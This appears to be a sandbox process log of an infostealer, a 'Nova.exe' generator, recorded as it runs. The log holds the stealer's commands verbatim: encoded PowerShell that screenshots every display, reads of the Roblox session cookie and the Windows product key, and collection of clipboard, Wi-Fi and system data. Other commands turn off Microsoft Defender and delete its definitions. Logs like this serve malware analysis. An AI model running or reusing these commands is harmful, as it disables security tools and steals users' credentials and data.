C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:4664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5500

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dc4eemxq\dc4eemxq.cmdline"
5⤵
PID:2288

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF43B.tmp" "c:\Users\Admin\AppData\Local\Temp\dc4eemxq\CSC7D4EB13FB3F245E5A683447C5B5FFB90.TMP"
6⤵
PID:4792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4624

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4084

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3216

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5944

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5928

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:5676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:2792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:5564

C:\Windows\system32\getmac.exe
getmac
4⤵
PID:3480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:5132

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:5240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:1484

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:5552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:5888

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:5688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:4124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:6092

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:3564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:5344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:6016

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:3560

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:5148

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:1588

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:5276

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:5444

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:1332

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:4572

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:4724

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:6140

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe'"
3⤵
PID:6024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:5464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:2496

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:5192

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:5272

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:3420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
PID:5992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:4324

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:4556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:240

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:4584

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:5204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:4860

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuA